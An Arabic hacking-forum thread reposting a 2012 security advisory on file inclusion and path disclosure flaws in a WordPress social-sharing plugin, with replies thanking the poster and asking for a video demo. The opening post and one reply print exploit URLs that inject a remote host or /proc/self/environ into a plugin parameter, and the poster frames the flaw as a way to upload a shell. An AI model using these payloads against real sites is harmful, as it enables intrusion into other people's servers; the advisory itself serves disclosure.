Follow us on Twitter Follow us on Facebook Watch us on YouTube





العودة   development-point > [ أقسام حماية واختراق المواقع والسيرفرات ] > قسم اختراق المواقع والسيرفرات > قسم الثغـرات


ثـغرة الورد بريس : Wordpress Social Discussions Plugin 6.1.1 Multiple Vulnerabilities

السسلام عليكم وحمة الله وبركـاتةة جديد ثغرات الوورد بريس الثغرة تستغل بـ: الكمد رفع الشل برابط مباشر الترجمةة بلغات البيرل + البايثون الكــود - Multiple Vulnerabilities

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم منذ /10-26-2012, 04:12 AM   #1
MhWy
Professional

الصورة الرمزية MhWy

MhWy غير متواجد حالياً

 رقم العضوية : 41
 تاريخ التسجيل : Oct 2012
 العمر : 34
 الجنس : ~ ذكر
 البلد : البـاحة
 المشاركات : 376
 إهتمامك : ~
 النقاط : 61
 قوة التقييم : MhWy will become famous soon enough

شكراً: 0
تم شكره مرة واحدة في مشاركة واحدة
Talking ثـغرة الورد بريس : Wordpress Social Discussions Plugin 6.1.1 Multiple Vulnerabilities

السسلام عليكم وحمة الله وبركـاتةة
جديد ثغرات الوورد بريس

الثغرة تستغل بـ:
الكمد
رفع الشل برابط مباشر
الترجمةة بلغات
البيرل + البايثون

الكــود

كود:
[waraxe-2012-SA#093] - Multiple Vulnerabilities in Wordpress Social Discussions Plugin 
====================================================================================== 
 
Author: Janek Vind "waraxe" 
Date: 17. October 2012 
Location: Estonia, Tartu 
Web: http://www.waraxe.us/advisory-93.html 
 
 
Description of vulnerable target: 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 
Enables Social Sharing of your blog posts to 30+ Social Networks. Plugin also 
enables you to Automatically Publish or Self Publish your Blog Posts to 25+  
Networks. 
 
http://wordpress.org/extend/plugins/social-discussions/ 
 
Affected version: 6.1.1 
 
############################################################################### 
1. Remote File Inclusion in "social-discussions-networkpub_ajax.php" 
############################################################################### 
 
Reasons: Uninitialized variable "$HTTP_ENV_VARS" 
Attack vectors: User-supplied parameter "HTTP_ENV_VARS" 
Preconditions: 
 1. register_globals=on 
 2. register_long_arrays=off 
 3. allow_url_include=on for RFI if PHP >= 5.2.0 
 4. PHP must be < 5.3.4 for LFI null-byte attacks 
 5. magic_quotes_gpc=off for LFI null-byte attacks 
 
 
Php script "social-discussions-networkpub_ajax.php" line 2: 
------------------------[ source code start ]---------------------------------- 
if (!function_exists('add_action')){ 
  @include_once($GLOBALS['HTTP_ENV_VARS']['DOCUMENT_ROOT'] . "/wp-config.php"); 
------------------------[ source code end ]------------------------------------ 
 
We can see, that script expects old-style array "HTTP_ENV_VARS" to be initialized 
and containing "DOCUMENT_ROOT" entry. But it appears, that if PHP directive 
"register_long_arrays=off", then "HTTP_ENV_VARS" is uninitialized and if in same time "register_globals=on", it is possible to fill that array with any value, leading to the RFI (Remote File Inclusion) vulnerability. Tests: http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub_ajax.php?HTTP_ENV_VARS[DOCUMENT_ROOT]=http://php.net/? http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub_ajax.php?HTTP_ENV_VARS[DOCUMENT_ROOT]=/proc/self/environ%00z ############################################################################### 2. Full Path Disclosure in multiple scripts ############################################################################### Reasons: Direct request to php script triggers pathname leak in error message Preconditions: PHP directive display_errors=on Result: Information Exposure Through an Error Message Tests: http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub.php Fatal error: Call to undefined function __() in C:\apache_www\wp342\wp-content\plugins\social-discussions\social-discussions-networkpub.php on line 2 http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions.php Fatal error: Call to undefined function __() in C:\apache_www\wp342\wp-content\plugins\social-discussions\social-discussions-networkpub.php on line 2 http://localhost/wp342/wp-content/plugins/social-discussions/social_discussions_service_names.php Fatal error: Call to undefined function __() in C:\apache_www\wp342\wp-content\plugins\social-discussions\social_discussions_service_names.php on line 3 Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe@yahoo.com Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ ---------------------------------- [ EOF ] ------------------------------------
أي استفسار انا جاهز
بالتوفيق

المصدر: development-point - للمزيد تابع : قسم الثغـرات


eJyvm hg,v] fvds : Wordpress Social Discussions Plugin 6>1>1 Multiple Vulnerabilities






  رد مع اقتباس
قديم منذ /10-26-2012, 06:28 AM   #2
اسطوره هكر
Creator

الصورة الرمزية اسطوره هكر

اسطوره هكر غير متواجد حالياً

 رقم العضوية : 40
 تاريخ التسجيل : Oct 2012
 العمر : 25
 الجنس : ~ ذكر
 المشاركات : 40
 النقاط : 24
 قوة التقييم : اسطوره هكر is on a distinguished road

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي رد: ثـغرة الورد بريس : Wordpress Social Discussions Plugin 6.1.1 Multiple Vulnerabilities

مشكور اخوي لاكن لو سويت شرح فديو وطبقت الثغرة يكون .ماقصرت






  رد مع اقتباس
قديم منذ /10-26-2012, 02:47 PM   #3
MhWy
Professional

الصورة الرمزية MhWy

MhWy غير متواجد حالياً

 رقم العضوية : 41
 تاريخ التسجيل : Oct 2012
 العمر : 34
 الجنس : ~ ذكر
 البلد : البـاحة
 المشاركات : 376
 إهتمامك : ~
 النقاط : 61
 قوة التقييم : MhWy will become famous soon enough

شكراً: 0
تم شكره مرة واحدة في مشاركة واحدة
افتراضي رد: ثـغرة الورد بريس : Wordpress Social Discussions Plugin 6.1.1 Multiple Vulnerabilities

المشاركة الأصلية كتبت بواسطة اسطوره هكر مشاهدة المشاركة
مشكور اخوي لاكن لو سويت شرح فديو وطبقت الثغرة يكون .ماقصرت
قريبـا ان شاء الله حبيبي
منور






  رد مع اقتباس
قديم منذ /10-26-2012, 04:36 PM   #4
Abdou-90
Creator

الصورة الرمزية Abdou-90

Abdou-90 غير متواجد حالياً

 رقم العضوية : 54
 تاريخ التسجيل : Oct 2012
 الجنس : ~ ذكر
 البلد : sqebd
 المشاركات : 36
 إهتمامك : sqebd
 النقاط : 10
 قوة التقييم : Abdou-90 is on a distinguished road

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي رد: ثـغرة الورد بريس : Wordpress Social Discussions Plugin 6.1.1 Multiple Vulnerabilities

يسلموا يا الغالي
وفي انتظار الفيديو






  رد مع اقتباس
قديم منذ /10-26-2012, 05:41 PM   #5
نقــِـِـِــِآءْ . .
Creator

الصورة الرمزية نقــِـِـِــِآءْ . .

نقــِـِـِــِآءْ . . غير متواجد حالياً

 رقم العضوية : 33
 تاريخ التسجيل : Oct 2012
 الجنس : ~ إنثى
 المشاركات : 23
 النقاط : 20
 قوة التقييم : نقــِـِـِــِآءْ . . is on a distinguished road

شكراً: 0
تم شكره مرة واحدة في مشاركة واحدة
افتراضي رد: ثـغرة الورد بريس : Wordpress Social Discussions Plugin 6.1.1 Multiple Vulnerabilities

المشاركة الأصلية كتبت بواسطة اسطوره هكر مشاهدة المشاركة
مشكور اخوي لاكن لو سويت شرح فديو وطبقت الثغرة يكون .ماقصرت

الثغره سهله ..
السكربت ورد بريس
الثغره lfi عرض يوزرات .
الملف :
social-discussions-networkpub_ajax.php
الاستغلال مثلا :
http://localhost/wp342/wp-content/pl...?HTTP_ENV_VARS[DOCUMENT_ROOT]=/proc/self/environ%00z


شكرا صاحب الموضوع .. ومبارك العيد






  رد مع اقتباس
قديم منذ /10-26-2012, 08:51 PM   #6
MhWy
Professional

الصورة الرمزية MhWy

MhWy غير متواجد حالياً

 رقم العضوية : 41
 تاريخ التسجيل : Oct 2012
 العمر : 34
 الجنس : ~ ذكر
 البلد : البـاحة
 المشاركات : 376
 إهتمامك : ~
 النقاط : 61
 قوة التقييم : MhWy will become famous soon enough

شكراً: 0
تم شكره مرة واحدة في مشاركة واحدة
افتراضي رد: ثـغرة الورد بريس : Wordpress Social Discussions Plugin 6.1.1 Multiple Vulnerabilities

المشاركة الأصلية كتبت بواسطة نقــِـِـِــِآءْ . . مشاهدة المشاركة


الثغره سهله ..
السكربت ورد بريس
الثغره lfi عرض يوزرات .
الملف :
social-discussions-networkpub_ajax.php
الاستغلال مثلا :
http://localhost/wp342/wp-content/pl...?http_env_vars[document_root]=/proc/self/environ%00z


شكرا صاحب الموضوع .. ومبارك العيد

يعطيك العافيةة
اختصار عضيم جدا جدا
شكرا ع المساعده ورفع هم الفيديو ض2
منورين الكل






  رد مع اقتباس
قديم منذ /12-22-2012, 07:36 PM   #7
jn3e
Creator

الصورة الرمزية jn3e

jn3e غير متواجد حالياً

 رقم العضوية : 311
 تاريخ التسجيل : Dec 2012
 الجنس : ~ ذكر
 المشاركات : 2
 النقاط : 10
 قوة التقييم : jn3e is on a distinguished road

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي رد: ثـغرة الورد بريس : Wordpress Social Discussions Plugin 6.1.1 Multiple Vulnerabilities

حلو حبي جدا ممتاز






  رد مع اقتباس
قديم منذ /09-01-2013, 11:29 PM   #8
مثنى هكر العراق
.:: بروفيسور الضحايا ::.

الصورة الرمزية مثنى هكر العراق

مثنى هكر العراق غير متواجد حالياً

 رقم العضوية : 7782
 تاريخ التسجيل : Aug 2013
 العمر : 26
 الجنس : ~ ذكر
 البلد : .:: IraQ ::.
 المشاركات : 28
 إهتمامك : .:: البرمجة والتطوير ::.
 النقاط : 13
 قوة التقييم : مثنى هكر العراق is on a distinguished road

شكراً: 0
تم شكره مرة واحدة في مشاركة واحدة
افتراضي رد: ثـغرة الورد بريس : Wordpress Social Discussions Plugin 6.1.1 Multiple Vulnerabilities

شكرا عزيزي بس لو فيديو كان احسن






  رد مع اقتباس
قديم منذ /09-02-2013, 12:36 AM   #9
GENERAL AMERICA
Ҳ̸ҳ~V.I.B~Ҳ̸ҳ

الصورة الرمزية GENERAL AMERICA

GENERAL AMERICA غير متواجد حالياً

 رقم العضوية : 6815
 تاريخ التسجيل : Jul 2013
 الجنس : ~ ذكر
 المشاركات : 964
 النقاط : 62
 قوة التقييم : GENERAL AMERICA will become famous soon enough

شكراً: 39
تم شكره 8 مرة في 7 مشاركة
افتراضي رد: ثـغرة الورد بريس : Wordpress Social Discussions Plugin 6.1.1 Multiple Vulnerabilities

عاشت ايدك حبيبي






  رد مع اقتباس
قديم منذ /09-02-2013, 01:21 AM   #10
α.Ł.G.Ё.Ŗ.M.Ă.N.Y
★SeCuRity★

الصورة الرمزية α.Ł.G.Ё.Ŗ.M.Ă.N.Y

α.Ł.G.Ё.Ŗ.M.Ă.N.Y غير متواجد حالياً

 رقم العضوية : 62
 تاريخ التسجيل : Oct 2012
 العمر : 34
 الجنس : ~ ذكر
 البلد : GerManY
 المشاركات : 138
 إهتمامك : Design
 النقاط : 62
 قوة التقييم : α.Ł.G.Ё.Ŗ.M.Ă.N.Y will become famous soon enough

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي رد: ثـغرة الورد بريس : Wordpress Social Discussions Plugin 6.1.1 Multiple Vulnerabilities

عاشت ايدك حبيبي






  رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

جديد قسم الثغـرات


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه للموضوع: ثـغرة الورد بريس : Wordpress Social Discussions Plugin 6.1.1 Multiple Vulnerabilities
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
ماهي الهندسة الاجتماعية (Social Engineering) ؟ saboteur قسم توزيعات أختبار الأخترآق المتقدم 11 03-01-2013 09:59 PM
Wordpress Easy Webinar Plugin Blind SQL Mr iNFiNiTi قسم الثغـرات 6 12-03-2012 08:50 PM
ثـغرة ببرنـامج سامسونق كايز Multiple Vulnerabilities MhWy قسم الثغـرات 7 11-14-2012 08:09 PM


الساعة الآن 02:48 PM

 



Powered by vBulletin® Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
development-point